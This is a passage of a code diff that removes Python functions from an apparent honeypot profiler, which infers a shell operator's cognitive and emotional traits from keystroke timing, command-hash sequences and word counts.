primitive="cognitive.error_resilience.frustration_typing",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.error_resilience.retry_tactic``.
|
||||
|
||||
For each command with ``Command.errored=True``, classify the
|
||||
operator's response by the *next* command:
|
||||
|
||||
* **rerun** — same first_token_hash as the errored command. The
|
||||
operator re-invoked the same tool (often after fixing args
|
||||
mid-edit, but we can't see args).
|
||||
* **switch** — different first_token_hash. Pivoted to a different
|
||||
tool.
|
||||
* **abort** — no next command. Session ended after the error.
|
||||
|
||||
The session's reported tactic is the **modal** response across all
|
||||
errored commands (with ties broken in registry order: rerun >
|
||||
modify > switch > abort). Skip emission entirely when no commands
|
||||
errored — the registry has no ``unknown`` here, and silence is the
|
||||
most honest answer.
|
||||
|
||||
The ``modify`` value (edit-and-retry) requires within-command
|
||||
diffing of arg tokens, which crosses the PII boundary the engine
|
||||
holds (only ``first_token_hash`` is retained per command). v0.1
|
||||
therefore never emits ``modify``; v0.2 will once the PII trade-off
|
||||
is revisited against a real attacker corpus.
|
||||
"""
|
||||
errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
|
||||
if not errored:
|
||||
return
|
||||
counts = {"rerun": 0, "switch": 0, "abort": 0}
|
||||
for i, cmd in errored:
|
||||
if i + 1 >= len(ctx.commands):
|
||||
counts["abort"] += 1
|
||||
elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
|
||||
counts["rerun"] += 1
|
||||
else:
|
||||
counts["switch"] += 1
|
||||
# Registry-order tiebreak (rerun > modify > switch > abort).
|
||||
# `modify` deferred — never increments here.
|
||||
order = ("rerun", "switch", "abort")
|
||||
value = max(order, key=lambda k: counts[k])
|
||||
|
||||
if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.65
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.error_resilience.retry_tactic",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.
|
||||
|
||||
Absolute count of distinct first_token_hashes. Skip emission when
|
||||
no commands exist; below the sample-size floor we still emit, but
|
||||
at confidence 0.40 — a session with few commands but five distinct
|
||||
tools is genuinely a moderate-vocabulary signal.
|
||||
"""
|
||||
if not ctx.commands:
|
||||
return
|
||||
distinct = len({c.first_token_hash for c in ctx.commands})
|
||||
if distinct <= TOOL_VOCAB_NARROW_MAX:
|
||||
value = "narrow"
|
||||
elif distinct >= TOOL_VOCAB_BROAD_MIN:
|
||||
value = "broad"
|
||||
else:
|
||||
value = "moderate"
|
||||
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.70
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.tool_vocabulary",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.
|
||||
|
||||
Read off the distribution of inter-command IATs:
|
||||
|
||||
* **deep** — many think-pauses (> ``IKI_THINK_MAX_S``). The
|
||||
operator stops to think between commands.
|
||||
* **reactive** — most pauses are sub-instant
|
||||
(≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing — automated
|
||||
runner, prepared playbook, or an LLM with no internal latency.
|
||||
* **shallow** — neither: mostly typing-speed pauses, no extended
|
||||
contemplation.
|
||||
|
||||
Skip emission when no inter-command IATs exist (one or zero
|
||||
commands); the registry has no ``unknown`` for this primitive.
|
||||
"""
|
||||
iats = ctx.inter_cmd_iats
|
||||
if not iats:
|
||||
return
|
||||
n = len(iats)
|
||||
deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
|
||||
reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
|
||||
deep_frac = deep_count / n
|
||||
reactive_frac = reactive_count / n
|
||||
|
||||
if deep_frac >= PLANNING_DEEP_MIN:
|
||||
value = "deep"
|
||||
elif reactive_frac >= PLANNING_REACTIVE_MIN:
|
||||
value = "reactive"
|
||||
else:
|
||||
value = "shallow"
|
||||
|
||||
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.65
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.planning_depth",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.
|
||||
|
||||
Two-axis classification over the first_token_hash sequence:
|
||||
|
||||
* **methodical** — low repetition, low backtracks. Operator marches
|
||||
forward through new tools.
|
||||
* **targeted** — high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
|
||||
Same tool re-invoked repeatedly; the operator is drilling.
|
||||
* **chaotic** — high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
|
||||
Jumps among previously-used tools without a clear thread.
|
||||
|
||||
The registry doesn't permit ``unknown``; below the
|
||||
MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
|
||||
rather than skip — the engine has *some* signal, just less of it.
|
||||
Skip emission only when there are no commands at all.
|
||||
"""
|
||||
n = len(ctx.commands)
|
||||
if n == 0:
|
||||
return
|
||||
hashes = [c.first_token_hash for c in ctx.commands]
|
||||
unique = len(set(hashes))
|
||||
repetition_rate = 0.0 if n == 0 else 1.0 - (unique / n)
|
||||
|
||||
# Backtrack: at position i, hashes[i] previously seen at index < i-1
|
||||
# and not equal to hashes[i-1]. (Repeating the immediate predecessor
|
||||
# is "drilling", picked up by repetition_rate; backtrack is the
|
||||
# non-local jump signal.)
|
||||
seen_before: set[str] = set()
|
||||
backtracks = 0
|
||||
transitions = 0
|
||||
if hashes:
|
||||
seen_before.add(hashes[0])
|
||||
for i in range(1, n):
|
||||
transitions += 1
|
||||
if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
|
||||
backtracks += 1
|
||||
seen_before.add(hashes[i])
|
||||
backtrack_rate = (backtracks / transitions) if transitions else 0.0
|
||||
|
||||
if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
|
||||
value = "chaotic"
|
||||
elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
|
||||
value = "targeted"
|
||||
else:
|
||||
value = "methodical"
|
||||
|
||||
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
confidence = 0.60
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.exploration_style",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.
|
||||
|
||||
Composite of three [0, 1]-clipped sub-signals, mean-aggregated:
|
||||
|
||||
* **chunking** — median CV of intra-command IATs / reference CV.
|
||||
Fragmented mid-command typing → high contribution.
|
||||
* **errors** — fraction of commands whose post-execution output
|
||||
matched a canonical error fingerprint (``Command.errored`` from
|
||||
Step D.0). Failures pile load.
|
||||
* **pace variability** — CV of inter-command IATs / reference CV.
|
||||
A spread of think-pause durations → unsettled cadence → load.
|
||||
|
||||
Components missing data contribute 0.0 (no penalty for an absent
|
||||
signal), and the composite normalises by *available* component
|
||||
count so a session with zero inter-command pauses isn't punished
|
||||
for the silence. Skip emission entirely when no commands at all
|
||||
exist — there's no honest answer.
|
||||
|
||||
v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
|
||||
"""
|
||||
if not ctx.commands:
|
||||
return
|
||||
|
||||
# Component A: chunking variance — median within-command CV
|
||||
per_cmd_cvs: list[float] = []
|
||||
for cmd_iats in ctx.intra_command_iats:
|
||||
cv = _cv(cmd_iats)
|
||||
if cv is not None:
|
||||
per_cmd_cvs.append(cv)
|
||||
if per_cmd_cvs:
|
||||
chunking_load: float | None = _clip01(
|
||||
statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
|
||||
)
|
||||
else:
|
||||
chunking_load = None
|
||||
|
||||
# Component B: error rate
|
||||
error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
|
||||
error_load = _clip01(error_load)
|
||||
|
||||
# Component C: pace variability — CV of inter-command IATs
|
||||
pace_cv = _cv(ctx.inter_cmd_iats)
|
||||
if pace_cv is not None:
|
||||
pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
|
||||
else:
|
||||
pace_load = None
|
||||
|
||||
components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
|
||||
if not components:
|
||||
return
|
||||
load = sum(components) / len(components)
|
||||
|
||||
if load < COGNITIVE_LOAD_LOW_MAX:
|
||||
value = "low"
|
||||
elif load < COGNITIVE_LOAD_MEDIUM_MAX:
|
||||
value = "medium"
|
||||
else:
|
||||
value = "high"
|
||||
|
||||
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||
confidence = 0.40
|
||||
else:
|
||||
# Composite over three soft sub-signals — held below the
|
||||
# cap of single-source primitives. D.8 re-tunes.
|
||||
confidence = 0.60
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.cognitive_load",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
|
||||
|
||||
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``cognitive.inter_command_consistency``.
|
||||
|
||||
CV (stdev / mean) of inter-command IATs.
|
||||
|
||||
* ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
|
||||
LLM-simulated session CV ≈ 0.24 in this corpus.
|
||||
* ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
|
||||
human session CV ≈ 0.94.
|
||||
* ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
|
||||
uses CV-only; true bimodal detection (Hartigan dip / two-peak)
|
||||
is filed for v0.2 per the registry's ``notes:`` field.
|
||||
"""
|
||||
iats = ctx.inter_cmd_iats
|
||||
if len(iats) < 2:
|
||||
return
|
||||
mean = statistics.fmean(iats)
|
||||
if mean <= 0.0:
|
||||
return
|
||||
cv = statistics.stdev(iats) / mean
|
||||
if cv < PAUSE_CV_METRONOMIC_MAX:
|
||||
value = "metronomic"
|
||||
elif cv >= PAUSE_CV_BIMODAL_MIN:
|
||||
value = "bimodal"
|
||||
else:
|
||||
value = "variable"
|
||||
confidence = (
|
||||
0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
|
||||
)
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="cognitive.inter_command_consistency",
|
||||
value=value,
|
||||
confidence=confidence,
|
||||
)
|
||||
@@ -1,223 +0,0 @@
|
||||
"""``emotional_valence.*`` feature functions (Phase G, soft block).
|
||||
|
||||
All four primitives in this module ride a hard 0.5 confidence cap
|
||||
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
|
||||
the feature functions, *not* via :func:`make_observation` — sample-size
|
||||
honesty may still pull confidence below 0.5.
|
||||
|
||||
Step G.5: ``emotional_valence.valence``.
|
||||
Step G.6: ``emotional_valence.arousal`` (lands later).
|
||||
Step G.7: ``emotional_valence.stress_response`` (lands later).
|
||||
Step G.8: ``emotional_valence.frustration_venting`` (lands later).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import statistics
|
||||
from typing import Iterator
|
||||
|
||||
from behave_core.spec.envelope import Observation
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||
from decnet.profiler.behave_shell._thresholds import (
|
||||
AROUSAL_BANG_RUN_MIN,
|
||||
AROUSAL_CALM_IAT_S,
|
||||
AROUSAL_CAPS_RUN_MIN,
|
||||
AROUSAL_FAST_IAT_S,
|
||||
AROUSAL_MIN_IATS,
|
||||
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
|
||||
FRUST_VENT_FULL_CONFIDENCE_MIN,
|
||||
FRUST_VENT_MIN_TYPED_CHARS,
|
||||
STRESS_DISTRESS_RATIO_MIN,
|
||||
STRESS_EUSTRESS_RATIO_MIN,
|
||||
STRESS_MIN_ERRORED_WITH_IATS,
|
||||
VALENCE_FULL_CONFIDENCE_MIN,
|
||||
VALENCE_MIN_HITS,
|
||||
VALENCE_MIN_TYPED_CHARS,
|
||||
)
|
||||
|
||||
|
||||
def _cap_soft(c: float) -> float:
|
||||
"""Clamp confidence to the soft-primitive ceiling."""
|
||||
return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)
|
||||
|
||||
|
||||
def valence(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.
|
||||
|
||||
Pure ratio over the lexical counters built in G.0:
|
||||
|
||||
* ``positive`` — ``positive_lex_hits > negative_lex_hits +
|
||||
obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
|
||||
* ``negative`` — ``negative_lex_hits + obscenity_hits >
|
||||
positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
|
||||
* ``neutral`` — fall-through.
|
||||
|
||||
Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
|
||||
Confidence hard-capped at 0.50 (registry convention); 0.30 below
|
||||
``VALENCE_FULL_CONFIDENCE_MIN`` (200).
|
||||
"""
|
||||
if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
|
||||
return
|
||||
pos = ctx.positive_lex_hits
|
||||
neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
|
||||
if pos > neg_total and pos >= VALENCE_MIN_HITS:
|
||||
value = "positive"
|
||||
elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
|
||||
value = "negative"
|
||||
else:
|
||||
value = "neutral"
|
||||
raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="emotional_valence.valence",
|
||||
value=value,
|
||||
confidence=_cap_soft(raw),
|
||||
)
|
||||
|
||||
|
||||
def arousal(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
|
||||
high_agitated}.
|
||||
|
||||
Three signals (any of which fires ``high_agitated``):
|
||||
|
||||
* ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5) — capslock rant.
|
||||
* ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3) — repeated bangs.
|
||||
* The fastest typing burst's median IAT < ``AROUSAL_FAST_IAT_S``
|
||||
(0.06) over a burst of ≥ ``AROUSAL_MIN_IATS`` (30) IATs.
|
||||
|
||||
``low_calm`` — slowest qualifying burst's median IAT >
|
||||
``AROUSAL_CALM_IAT_S`` (0.30).
|
||||
|
||||
``medium_engaged`` — fall-through.
|
||||
|
||||
Skip emission when no qualifying typing bursts. Confidence hard-
|
||||
capped at 0.50; 0.30 below ``AROUSAL_MIN_IATS`` total typed IATs.
|
||||
"""
|
||||
qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
|
||||
if not qualifying:
|
||||
return
|
||||
fastest_med = min(statistics.median(b) for b in qualifying)
|
||||
slowest_med = max(statistics.median(b) for b in qualifying)
|
||||
total_iats = sum(len(b) for b in qualifying)
|
||||
|
||||
if (
|
||||
ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
|
||||
or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
|
||||
or (
|
||||
total_iats >= AROUSAL_MIN_IATS
|
||||
and fastest_med < AROUSAL_FAST_IAT_S
|
||||
)
|
||||
):
|
||||
value = "high_agitated"
|
||||
elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
|
||||
value = "low_calm"
|
||||
else:
|
||||
value = "medium_engaged"
|
||||
raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="emotional_valence.arousal",
|
||||
value=value,
|
||||
confidence=_cap_soft(raw),
|
||||
)
|
||||
|
||||
|
||||
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``emotional_valence.stress_response`` ∈ {none,
|
||||
eustress_positive, distress_negative}.
|
||||
|
||||
Compare typing speed *after* an errored command vs the session
|
||||
baseline:
|
||||
|
||||
* For each errored command at index ``i``, gather
|
||||
``ctx.intra_command_iats[i+1]`` — the response command's intra-
|
||||
command IATs.
|
||||
* Baseline: median of all intra-command IATs from commands NOT
|
||||
immediately following an errored command.
|
||||
|
||||
Verdict by ratio of post-error / baseline:
|
||||
|
||||
* ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
|
||||
(slowed down — recovered, deliberate).
|
||||
* ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
|
||||
(sped up — anxious, mashing keys).
|
||||
* otherwise → ``none``.
|
||||
|
||||
Skip emission when no commands. Confidence hard-capped at 0.50;
|
||||
0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
|
||||
with non-empty post-error IAT data.
|
||||
"""
|
||||
if not ctx.commands:
|
||||
return
|
||||
post_error_iats: list[float] = []
|
||||
baseline_iats: list[float] = []
|
||||
n = len(ctx.commands)
|
||||
qualifying_errored = 0
|
||||
for i, cmd in enumerate(ctx.commands):
|
||||
is_post_error = i > 0 and ctx.commands[i - 1].errored
|
||||
iats = list(ctx.intra_command_iats[i]) if i < len(ctx.intra_command_iats) else []
|
||||
if is_post_error:
|
||||
if iats:
|
||||
qualifying_errored += 1
|
||||
post_error_iats.extend(iats)
|
||||
else:
|
||||
baseline_iats.extend(iats)
|
||||
# mypy: silence unused-var on n / cmd (kept for clarity)
|
||||
_ = (n, cmd)
|
||||
if not post_error_iats or not baseline_iats:
|
||||
value = "none"
|
||||
else:
|
||||
med_post = statistics.median(post_error_iats)
|
||||
med_base = statistics.median(baseline_iats)
|
||||
if med_base <= 0.0:
|
||||
value = "none"
|
||||
else:
|
||||
ratio = med_post / med_base
|
||||
if ratio >= STRESS_EUSTRESS_RATIO_MIN:
|
||||
value = "eustress_positive"
|
||||
elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
|
||||
value = "distress_negative"
|
||||
else:
|
||||
value = "none"
|
||||
raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="emotional_valence.stress_response",
|
||||
value=value,
|
||||
confidence=_cap_soft(raw),
|
||||
)
|
||||
|
||||
|
||||
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
|
||||
"""Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.
|
||||
|
||||
Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):
|
||||
|
||||
* ``detected`` — ``obscenity_hits ≥ 1``.
|
||||
* ``none`` — zero hits.
|
||||
|
||||
Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
|
||||
letters — too thin to call cleanly absent. Confidence hard-capped
|
||||
at 0.50; 0.40 when ``detected``; 0.50 only when ``none`` AND
|
||||
typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN`` (200);
|
||||
0.30 otherwise.
|
||||
"""
|
||||
if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
|
||||
return
|
||||
if ctx.obscenity_hits >= 1:
|
||||
value = "detected"
|
||||
raw = 0.40
|
||||
else:
|
||||
value = "none"
|
||||
if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
|
||||
raw = 0.50
|
||||
else:
|
||||
raw = 0.30
|
||||
yield make_observation(
|
||||
ctx,
|
||||
primitive="emotional_valence.frustration_venting",
|
||||
value=value,
|
||||
confidence=_cap_soft(raw),
|
||||
)
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user